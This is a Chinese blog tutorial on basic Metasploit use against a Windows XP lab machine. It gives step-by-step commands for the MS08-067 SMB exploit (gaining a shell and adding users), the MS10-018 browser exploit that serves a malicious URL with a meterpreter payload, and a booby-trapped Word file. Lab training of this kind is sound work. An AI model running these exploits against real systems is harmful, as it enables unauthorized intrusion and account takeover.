Metasploit(MSF)的基础使用二

已于 2024-05-30 09:37:33 修改
阅读量762 收藏 15
点赞数 9
文章标签: linux 运维 服务器
于 2024-05-30 09:35:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80453793/article/details/139288856
版权

MSF渗透测试

使用Windows xp作为靶机

(一)、网络服务器攻击渗透

msfconsole进入MSF服务

 输入use命令可以使用该漏洞利用模块,列如use exploit/windows/smb/ms08_067_netapi

使用show options命令查看需要设置的参数

里面的LHODST为localhost,代表Kali的IP地址。而且端口是4444

set RHOST 192.168.67.130(搭建的靶场的IP)

run

使用shell命令可以拿到xp的shell

拿到xp的shell后可以使用net user查看用户

也可以添加用户

还可以删除用户

(二)、浏览器攻击渗透

(1)、大概介绍

msf 会生成一个网页 只要点击了这个网页就上线了

会把经过ms10_018的漏洞生成一个网页,只要把这个网页点开了之后控制权就到Kali中

(2)、实战操作

msfconsole

执行use exploit/windows/browser/ms10_018_ie_behaviors命令

设置自己服务器的IP,set SRVHOST 192.168.67.150(kali自己的IP)

设置payload正向连接的shell

set PAYLOAD windows/meteroreter/bind_tcp

为了方便识别,把端口设置为4441或4442,即使不设置也行

set LPORT 4441

exploit -j

Kali会生成一个url,我们只需要让目标主机访问这个url

#等待靶机执行

访问url

访问成功后在Kali中会出现successfully

jobs

sessions -i 1

i 是in的缩写,进入的意思

1表示id号

shell

现在就能执行shell了

(三)、生成word调用计算器的程序

进入msfconsole

use命令使用这个模块

设置一个payload

我们设置只要目标主机访问Word就自动弹出一个计算器

设置这个Word的名字为ceshi

run运行一下

含有.的话表示一个隐藏的文件夹,我们到root目录下找到隐藏的文件夹

在靶机上运行Word文件,发现直接自动调出计算器

靓屹
关注
metasploit-framework-6.3.34.zip
09-17
Metasploit Framework,简称MSF,是一款开源的安全漏洞检测工具,主要用于安全研究人员进行渗透测试和漏洞验证。这个版本是6.3.34,代表着软件的最新迭代,通常会包含最新的功能、修复和性能改进。在网络安全领域,...
metasploit使用手册.xmind
10-16
metasploit神器总结,介绍基本命令、模块、信息收集、后渗透攻击等。渗透攻击步骤。主机扫描。辅助模块端口扫描。查找可用端口模块。msf>search portscan。服务扫描、辅助模块
Metasploit MacOs版本
08-04
在只有Mac电脑的前提下,虽然可以装虚拟机,但是执行速度略慢,所以不如直接装MSF.pmg
metasploit中文使用详解.pdf
08-14
**Metasploit Framework (MSF)** 提供了一套完整的解决方案,使得用户能够高效地利用各种漏洞进行测试。该框架的设计采用了模块化的结构,可以将payloads(有效载荷)、编码器、无操作生成器以及漏洞利用程序整合在...
Linux】网络编程3
m0_73839343的博客
11-12 673
该数组里列这个进程打开的所有文件的文件描述符。数组的下标是文件描述符,是一个整数,而数组的内容是一个指针,指向内核中所有打开的文件的列表,也就是说内核可以通过文件描述符找到对应打开的文件。然后每个文件都有一个inode,Socket 文件的 inode指向了内核中的Socket 结构,在这个结构体里有两个队列,分别是发送队列和接收队列,这个两个队列里面保存的是一个个struct sk_buff,用链表的组织形式串起来。在TCP通信的过程,服务器端会产生两类不同的文件描述符,一个是监听的文件描述符;
Linux】多线程(中)
Eristic0618的博客
11-14 1086
本篇文章围绕Linux中的多线程展开讲解,包含线程互斥的概念、互斥量mutex和相关API、互斥量原理、重入和线程安全、死锁、线程同步和条件变量等内容
Linux:网络协议socket
Au_ust的博客
11-05 1550
我们之前学的通信是本地进程间通信,如果我们想在网络间通信的话,就需要用到者的ip地址,分别被称为源IP地址和目的IP地址,被存入ip数据包中,其次我们还需要遵循一些通信协议。TCP协议:传输层协议,有连接,可靠传输,面向字节流(无明确边界的字节序列),难UDP协议:传输层协议,无连接,不可靠传输,面向数据流(以数据包为单位),简单网络通信的本质也是进程间通信,你怎么知道你要和哪个进程通信?
操作系统实验:在linux下用c语言模拟进程调度算法程序
最新发布
m0_68165821的博客
11-15 623
进程每执行一次,进程需要的时间片数减1、该进程的优先数减3。进程执行时,每运行一个时间片,进程还需要的时间片数减1,运行进程占用处理机的时间片数加1,然后比较占用CPU的时间片数是否与该进程的轮转时间片数相等,若相等则说明已达到轮转时间,应将现运行的进程排列就绪队列的末尾,调度队列上的首进程运行,且改变它们的进程状态,直至所有进程完成各自的时间片。(4)为了清楚地观察每个进程的调度过程,程序应将每个时间片内的进程的情况显示来,包括正在运行的进程,处于就绪队列中的进程和处于阻塞队列中的进程。
SimpleScreenRecorder, a screen recording tool for Linux
likecayon的博客
11-11 375
【代码】SimpleScreenRecorder, a screen recording tool for Linux
expect 脚本中无法将数字字符串转为数字
weixin_43360707的博客
11-14 93
【代码】Linux 中Set enable-bracketed-paste off。
Linux(CentOS 7) yum一键安装mysql8
风兮雨露的博客
11-12 653
输入链接IP、账号root、密码123456,端口号 3306,显示“连接成功”代表流程通了。自此在linux系统上安装mysql8已经完成,并且可以使用图形化界面远程连接。mysql已经可以本地连接上了,但要用图形化界面远程连接,需开放防火墙的3306端口才行。(2)输入密码并且修改密码(密码规则是4种类型字符)登录命令: mysql -u root -p。(2)安装mysql yum 仓库配置文件。(3)先清理缓存(可能以前被操作过)(1)选中mysql数据库。(2)设置允许远程连接并生效。
linux逻辑卷练习
feng68_的博客
11-15 265
从新硬盘制作三个分区每个分区都 3GB大小, 将三个分区只作为物理卷,通过这三个物理卷创建卷组 通过卷组生成一个逻辑卷,大小为7G,再将逻辑卷调整到10G。物理卷(physical volume):简称PV。逻辑卷(logical volume):简称LV。卷组(Volume Group):简称VG。
gdb编译教程(支持linux下X86和ARM架构)
weixin_43246170的博客
11-12 263
5、我们先开始x86版本,这个比较简单,不需要配置交叉编译工具(当然前提是系统装了gcc和g++的环境啊)。将gdb文件拷贝到对应平台下,即可使用。(或者使用gdbserver远程调试)以上这些配置都是要跟在./configure后面的。3、解压,然后进入到目录下,打开当前目录的命令行窗口。2、下载完后拷贝到linux的x86系统。先清理下编译x86残留下的临时文件。6、限制我们来编译ARM版本。4、创建一个生成目录。我下载的8.2版本。
初识Linux · 信号保存
更新各种计算机技能~
11-15 945
前文我们已经介绍了信号产生,在时间的学习线上,信号的学习分为预备知识,信号产生,信号保存,信号处理,本文我们学习信号保存,在前言部分,我们介绍几个信号保存中的概念。信号递达:实际执行信号的处理动作。信号未决:信号从产生到递达之间的状态。对于信号产生之后,在递达的这个过程,成为未决,就像老师给你布置了作业,你接受到了做作业的这个信号,但是因为贪玩,不想做,这个状态,就是未决。
linux怎么查看网络带宽命令
欢迎你们到来,希望能帮到大家
11-15 57
linux怎么查看网络带宽命令,工具的安装以及使用
连接实验室服务器并创建虚拟环境,从本地上传文件到linux服务器使用requirement.txt安装环境需要的依赖的方法及下载缓慢的解决方法(Linux)
aha_xigua的博客
11-12 426
现在你已经成功创建并激活了一个新的conda环境。如果返回了版本信息,说明conda已经安装。如果没有安装,你需要先安装conda。创建一个新的conda环境。在你的个人计算机上打开终端(命令行界面)。输入密码后,你将成功连接到实验室服务器。三、利用conda创建环境。
redis linux 安装
qq_40691438的博客
11-15 250
将 Redis 配置为绑定到 0.0.0.0 可以使其监听所有网络接口,从而允许从任何网络接口连接到 Redis 服务器。这通常用于在生产环境中允许多个客户端从不同的网络连接到 Redis。然而,这样做会暴露 Redis 服务器,因此必须确保有适当的安全措施。(我的是centos-stream-8)要搞密码,不然容易被攻击。
Linux ssh 基础教程
tangPHP的博客
11-13 869
SSH是一种安全协议,用作远程连接Linux服务器的主要手段。它通过生成远程shell提供基于文本的界面。连接之后,在本地终端中键入的所有命令都将发送到远程服务器并在那里执行,一般说ssh即openssh。OpenSSH(Open Secure Shell),是一套安全的网络工具,它在不安全的网络上提供加密通信。它主要用于安全远程登录、文件传输和其他安全网络服务。
掌握Metasploit框架基础要点
Metasploit Framework(MSF)提供了强大的命令行界面和图形界面,用户可以通过这些界面来配置和运行漏洞利用代码(Exploit),加载和使用攻击载荷(Payload),并最终控制远程系统。Metasploit拥有大量的已知漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值